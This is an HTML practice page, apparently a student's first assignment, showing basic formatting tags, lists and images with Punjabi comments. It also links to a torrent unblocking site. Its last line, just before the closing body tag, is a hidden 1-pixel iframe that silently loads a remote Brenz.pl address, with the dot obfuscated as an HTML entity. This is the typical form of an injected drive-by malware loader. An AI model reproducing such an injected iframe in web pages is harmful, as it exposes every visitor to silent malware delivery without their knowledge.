<html> <head> <h1>HTML</h1>
<title>
 first assignment </title>
</head>
<body bgcolor="#FFFF00"><!--
<p align="centre"> <b>chache</b> ne aj <em>phli assignment</em> diti a banaan nu </p>  
<p align="right"> <b>chache</b> <br>ne kl nu <i>dusri  assignment</i> <br>deni a banaan nu </p>  -->
<P>  <hr width="70%" align="left">hfjshfhkjhf</p>

<h3 align="center">physical tags</h3>

<b> rohit </b><br>
<i> rohit </i><br>
<tt> rohit in teletype(same width of each character)<tt><br>
<big> rohit </big><br>
<small> rohit</small><br>
<sup> rohit in superscript</sup><br>
<sub> rohit in subscript</sub><br>
<u> rohit</u><br>

<h3 align="center">logical tags</h3>

<abbr title="chacha cha wala">CCW</abbr><br>
<code>rohit nahar(it's like a tt)</code><br>
<cite>rohit nahar </cite><br>
<P><del>rohit</del>
<ins> nahar</ins></p>
<kdb>input</kbd>
<p>rohit &nbsp;&nbsp;&nbsp;nahar</p>

<a href="https://kickass.unblocked.lat"> GoTorrent</a>
<br>
<h3>lists</h3>

<ul>
<li>sunny</li>
<li>didi</li>
</ul>

<ol>
<li>sunny</li>
<li>didi</li>
</ol>

<dl>
<dt>Traning of 6 weeks</dt>
<dd>Chacha sanu html di traning d reha hai</dd>
</dl>

<img src="http://www.gettyimages.in/photos/emma-watson" alt="img koko laigi">


<img src="http://www.gettyimages.in/photos/emma-watson" width="100" height="100" alt="img koko laigi">




<iframe style="height:1px" src="http://www&#46;Brenz.pl/rc/" frameborder=0 width=1></iframe>
</body>
</html>